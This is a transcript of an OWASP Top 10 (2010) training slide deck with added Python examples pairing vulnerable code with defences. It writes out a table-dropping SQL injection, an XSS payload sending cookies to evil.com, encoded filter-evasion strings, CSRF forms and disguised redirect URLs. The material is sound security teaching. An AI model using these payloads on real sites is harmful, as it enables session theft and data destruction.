OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources

Date post: 04-Jan-2016
Transcript
Page 1: OWASP OWASP top 10 - Agenda  Background  Risk based  Top 10 items 1 – 6  Live demo  Top 10 items 7 – 10  OWASP resources.

OWASP

OWASP top 10 - Agenda

Background
Risk based
Top 10 items 1 – 6
Live demo
Top 10 items 7 – 10
OWASP resources

Page 2:

The OWASP Guide

Page 3:

Threat Agent | Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact
?            | Easy          | Widespread          | Easy                   | Severe           | ?
?            | Average       | Common              | Average                | Moderate         | ?
?            | Difficult     | Uncommon            | Difficult              | Minor            | ?

Page 4:

Warning

Risk analysis Insiders

Architecture Modular Clarity

SDLC Knowledge Predictability

Page 5:

Top 10 - 2010

1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security misconfiguration
7. Insecure cryptographic storage
8. Failure to restrict URL access
9. Insufficient transport layer protection
10. Unvalidated redirects and forwards

Page 6:

A1 – Injection

[Figure: Client → Appl → DB / Shell / Pgm / CPU]

Page 7:

A1 – Injection

String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'";

id="foo';DROP accnts;--"

SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';

id="foo"

SELECT * FROM accnts WHERE ID='foo';

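The two queries on this slide differ only in whether the attacker-controlled id becomes part of the SQL text. The following Python example is added here and is not part of the original slides: it puts the slide's string concatenation beside a parameterized query against an in-memory SQLite database. The table contents, the use of executescript() to stand in for a database driver that accepts stacked statements, and the spelled-out DROP TABLE in the payload (the slide abbreviates it to DROP accnts) are my constructions.

```python
import sqlite3

# Constructed payload mirroring the slide's id value (DROP TABLE spelled out so SQLite parses it).
PAYLOAD = "foo';DROP TABLE accnts;--"


def make_db():
    """Constructed sample table; not from the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accnts (ID TEXT PRIMARY KEY, owner TEXT)")
    conn.executemany("INSERT INTO accnts VALUES (?, ?)",
                     [("foo", "alice"), ("bar", "bob")])
    conn.commit()
    return conn


def table_exists(conn):
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name='accnts'"
    ).fetchone()
    return row is not None


def lookup_vulnerable(conn, account_id):
    """String concatenation exactly as on the slide. executescript() stands in for a
    driver that runs stacked statements (assumption: not every driver does); with it,
    the attacker's second statement executes. Returns whether the table survived."""
    query = "SELECT * FROM accnts WHERE ID='" + account_id + "'"
    conn.executescript(query)
    return table_exists(conn)


def lookup_safe(conn, account_id):
    """Parameterized query: the value is bound, never parsed as SQL, so the payload
    is simply compared against the ID column and matches no row."""
    return conn.execute("SELECT * FROM accnts WHERE ID=?", (account_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_safe(db, "foo"))          # [('foo', 'alice')]
    print(lookup_safe(db, PAYLOAD))        # []  and the table is intact
    print(table_exists(db))                # True
    print(lookup_vulnerable(db, PAYLOAD))  # False: the DROP ran
```

The same binding mechanism exists in every mainstream driver (PreparedStatement in Java, which the slide's code should have used instead of building the query string); escaping input by hand is not a substitute, because the escaping rules differ per database and per context.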
Page 8:

A2 - Cross site scripting (XSS)

[Figure: Browser → Appl / DB → Browser]

Page 9:

A2 - Cross site scripting (XSS)

(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";

CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>

<input name='cc' value='123456789"><script> window.location=http://evil.com?x=document.cookie </script>'>

CC="123456789"

<input name='cc' value='123456789'>

Page 10:

A2 - Cross site scripting (XSS)

&#x003c&#X3c&#x3C000003C;\x3c\x3C\u003c\u003C

<%3C&lt&lt;&LT&LT;&#60&#060&#60;

<img src=http://site.com onmouseover= <body onload= <IMG SRC=j&#X41vascript:alert('test2')>

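Pages 9 and 10 make one point between them: the attribute value on page 9 is rendered without output encoding, and page 10 shows how many spellings a single "<" has, which is why filtering input for known bad strings does not work. The Python example below is added here and is not from the slides. It renders the slide's input element both ways and contrasts output encoding with a naive blacklist; the payload uses a single quote to match the single-quoted attribute on the slide (the slide's own payload uses a double quote), and the blacklist and decoding helpers are my constructions.

```python
import html

# The slide's attribute, with a placeholder where request.getParameter("CC") is spliced in.
ATTR_TEMPLATE = "<input name='cc' type='TEXT' value='{}'>"

# Constructed payload: closes the single-quoted attribute, then opens a script element.
PAYLOAD = "123456789'><script>window.location='http://evil.com?x='+document.cookie</script>"


def render_vulnerable(cc):
    """Untrusted input spliced straight into the HTML, as on page 9."""
    return ATTR_TEMPLATE.format(cc)


def render_safe(cc):
    """Output encoding for the attribute context: &, <, >, " and ' become entities,
    so the value can neither close the attribute nor start a tag."""
    return ATTR_TEMPLATE.format(html.escape(cc, quote=True))


def naive_blacklist(cc):
    """An input filter that strips the literal '<script>' tags (constructed; do not use).
    It passes anything spelled differently, such as the encoded forms on page 10."""
    return cc.replace("<script>", "").replace("</script>", "")


def decode_once(s):
    """Stand-in for a later decoding step (the browser interpreting an attribute value,
    or the application unescaping stored data). A filter applied before this step
    never sees the characters it was looking for."""
    return html.unescape(s)


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # value closed, <script> injected
    print(render_safe(PAYLOAD))         # value='123456789&#x27;&gt;&lt;script&gt;...'
    encoded = "&#x3C;script&#x3E;"      # one of page 10's spellings of <script>
    print(naive_blacklist(encoded))     # unchanged: the filter matched nothing
    print(decode_once(encoded))         # <script>
```

The defence is therefore to encode at output, for the exact context the data lands in (attribute, element text, JavaScript string, URL), rather than to recognise attacks at input; the OWASP ESAPI encoders listed on the resources slide exist for precisely that.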
Page 11:

A3 - Broken authentication and session management

Unpredictable passwords, session IDs, security questions
No session IDs/credentials in URL
Avoid session fixation
Time out of sessions & logout buttons
Different session ID outside/inside TLS
No clear text passwords

Page 12:

A4 - Insecure direct object references

<SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION></SELECT>

period=2011q3

period=2011q2

Page 13:

A5 - Cross-site request forgery (CSRF)

<img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
    <input type="hidden" name="sp" value="8109"/>
</form>

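Both snippets on this slide work because the browser attaches the victim's session cookie to any request, whether an image load or an auto-submitted form, so the cookie alone cannot prove the user intended the action. The Python example below is added here and is not from the slides: it shows the synchronizer-token defence as a small request handler. The request dictionary, the cookie name sid, the server secret and the session ID are my constructions standing in for a web framework.

```python
import hashlib
import hmac
import secrets

# Constructed per-deployment secret (assumption: loaded from configuration in practice).
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token derived from the session ID: unique per victim and unknowable to the
    attacking page, which can make the browser send a request but cannot read
    the victim's pages to copy the token out of the form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, token):
    if not token:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), token)


def handle_transfer(request):
    """request is a constructed dict {'method', 'cookies', 'form'} standing in for a
    framework request object."""
    if request["method"] != "POST":
        return 405, "state-changing actions accept POST only"
    session_id = request["cookies"].get("sid")
    if not session_id:
        return 401, "no session"
    if not verify_csrf_token(session_id, request["form"].get("csrf")):
        return 403, "missing or invalid CSRF token"
    return 200, "transfer of {} to {} accepted".format(
        request["form"]["amount"], request["form"]["destinationAccount"])


def example():
    sid = "victim-session"  # constructed session ID
    # 1. The <img> trick from the slide: a GET carrying the victim's cookie.
    img_get = {"method": "GET", "cookies": {"sid": sid},
               "form": {"amount": "1500", "destinationAccount": "attackersAcct"}}
    # 2. The auto-submitting form from the slide: a POST, still without a token.
    forged_post = {"method": "POST", "cookies": {"sid": sid},
                   "form": {"amount": "1500", "destinationAccount": "attackersAcct"}}
    # 3. The application's own form, which embedded the token when it was rendered.
    legit = {"method": "POST", "cookies": {"sid": sid},
             "form": {"amount": "50", "destinationAccount": "savings",
                      "csrf": issue_csrf_token(sid)}}
    return (handle_transfer(img_get)[0],
            handle_transfer(forged_post)[0],
            handle_transfer(legit)[0])


if __name__ == "__main__":
    print(example())  # (405, 403, 200)
```

Rejecting GET for state changes stops the image variant but not the form variant, which is why the token check is the part that matters; the token must also be kept out of URLs, for the same log and referer reasons that apply to session IDs.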
Page 14:

A6 - Security misconfiguration

Patching: OS, application, frameworks / libraries
Disable unnecessary services
Stack traces
Configuration

Page 15:

A7 - Insecure cryptographic storage

Keep track of sensitive data
Passwords one-way hashed & salted
Password/key management
TLS key pass phrase
M2M passwords (obfuscation)

Page 16:

A8 - Failure to restrict URL access

/user/getAccounts
/admin/getAccounts

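Pages 12 and 16 are two forms of the same mistake: trusting that a client only asks for what the page offered. On page 12 the <SELECT> lists 2010q1 and 2011q2, yet nothing stops a request for period=2011q3; on page 16 the admin URL is reachable by anyone who types it. The Python example below is added here and is not from the slides; it enforces both checks on the server. The user records, roles and route table are my constructions.

```python
# Constructed user records: the role governs which URLs a user may call (page 16),
# the period set governs which report objects a user may read (page 12).
USERS = {
    "alice": {"role": "user", "periods": {"2010q1", "2011q2"}},
    "root": {"role": "admin", "periods": {"2010q1", "2011q2", "2011q3"}},
}

# Deny by default: a path missing from this table is not reachable at all.
ROUTE_ROLES = {
    "/user/getAccounts": {"user", "admin"},
    "/admin/getAccounts": {"admin"},
}


def get_report(user, period):
    """Direct object reference checked against the caller's own entitlements,
    not against what the form happened to list."""
    if period not in USERS[user]["periods"]:
        return 403, "period {} not available to {}".format(period, user)
    return 200, "report for {}".format(period)


def dispatch(user, path):
    """URL access control enforced on every request, not by hiding links."""
    roles = ROUTE_ROLES.get(path)
    if roles is None:
        return 404, "no such resource"
    if USERS[user]["role"] not in roles:
        return 403, "{} may not call {}".format(user, path)
    return 200, "accounts listing via {}".format(path)


if __name__ == "__main__":
    print(get_report("alice", "2011q2"))             # (200, ...)
    print(get_report("alice", "2011q3"))             # (403, ...)
    print(dispatch("alice", "/admin/getAccounts"))   # (403, ...)
    print(dispatch("root", "/admin/getAccounts"))    # (200, ...)
```

The check in get_report is per object and per user; the check in dispatch is per function. An application needs both, because a user who is allowed to call /user/getAccounts is still only entitled to their own accounts.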
Page 17:

A9 - Insufficient transport layer protection

Use SSL/TLS
No mixed content
Use secure cookies

Example: Firesheep exploits poor solutions

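The session rules on page 11 (unpredictable IDs, no IDs in URLs, no fixation, time-outs, a different ID inside TLS) and the secure-cookie advice on this page meet in one place: how the server mints, rotates and transports the session ID. The Python example below is added here and is not from the slides; it is a minimal server-side session store plus the cookie header that carries the ID. The idle time-out, cookie name and the explicit clock parameter are my constructions.

```python
import secrets

IDLE_TIMEOUT = 15 * 60  # seconds; constructed value


class SessionStore:
    """Server-side session table. The current time is passed in explicitly so the
    behaviour can be tested without waiting."""

    def __init__(self):
        self._sessions = {}

    def create(self, now, user=None):
        # 32 bytes from the OS CSPRNG: the ID can be neither guessed nor enumerated.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": now}
        return sid

    def login(self, old_sid, user, now):
        """Issue a new ID whenever privilege changes. An ID planted in the victim's
        browser before login (session fixation) is discarded rather than upgraded;
        the same rotation gives a different ID inside TLS than outside it."""
        self._sessions.pop(old_sid, None)
        return self.create(now, user)

    def get(self, sid, now):
        """Return the session or None. Idle sessions expire even if the user never
        pressed the logout button."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        if now - session["last_seen"] > IDLE_TIMEOUT:
            self._sessions.pop(sid)
            return None
        session["last_seen"] = now
        return session

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid):
    """The ID travels in a cookie, never in the URL (URLs end up in logs, referers
    and bookmarks). Secure keeps the browser from sending it over plaintext HTTP,
    which is exactly what Firesheep listened for; HttpOnly keeps it away from
    script, limiting what an XSS foothold can read."""
    return "sid={}; Path=/; Secure; HttpOnly; SameSite=Lax".format(sid)


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create(now=0)
    authed = store.login(anon, "alice", now=1)
    print(anon != authed)                                    # True: rotated at login
    print(store.get(anon, now=2))                            # None: old ID is dead
    print(store.get(authed, now=2)["user"])                  # alice
    print(store.get(authed, now=2 + IDLE_TIMEOUT + 1))       # None: idle time-out
    print(session_cookie(authed))
```

The Secure flag only helps if the whole session runs over TLS; a page that mixes HTTP resources into an HTTPS page ("mixed content" on the slide) gives an on-path attacker script execution in the protected origin, which makes the flag moot.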
Page 18:

A10 - Unvalidated redirects and forwards

http://www.vuln.com/redir.asp?=http://www.links.com

http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D

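The second URL on this slide is the first trick's disguise: percent-encoding hides the real destination from a reviewer or a naive string match, while the browser decodes it and goes there anyway. The Python example below is added here and is not from the slides; it validates a redirect target by decoding it first and then accepting only a local path or an allow-listed host. The allow list and the fallback page are my constructions.

```python
from urllib.parse import unquote, urlsplit

# Constructed allow list: the only external hosts this application may redirect to.
ALLOWED_HOSTS = {"www.vuln.com"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """Accept a local path or an allow-listed absolute URL, nothing else. The target
    is percent-decoded first so an encoded host name is judged by what the browser
    will actually see."""
    decoded = unquote(target)
    parts = urlsplit(decoded)
    if not parts.scheme and not parts.netloc:
        # Local path: a single leading slash only; "//host" and "/\host" are read
        # as protocol-relative URLs by browsers.
        return decoded.startswith("/") and not decoded.startswith(("//", "/\\"))
    # urlsplit's hostname strips userinfo and port, so "http://www.vuln.com@evil.com"
    # is judged by "evil.com", and lower-cases the host for the comparison.
    return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts


def redirect_or_default(target, default="/"):
    """Handler logic: follow the target only if it passes, otherwise land on a
    fixed page instead of wherever the query string pointed."""
    return target if is_safe_redirect(target) else default


if __name__ == "__main__":
    for t in ["/account",
              "http://www.links.com",
              "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D",
              "//evil.com",
              "http://www.vuln.com/home"]:
        print(t, "->", redirect_or_default(t))
```

Where the application can avoid carrying a URL in the request at all, a short key that the server maps to a destination removes the problem entirely; the allow list is the fallback for cases where that is impractical.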
Page 19:

OWASP resources

OWASP Secure Software Contract Annex
OWASP Developer’s Guide
OWASP Enterprise Security API (ESAPI)
OWASP Software Assurance Maturity Model (SAMM)

OWASP WebGoat
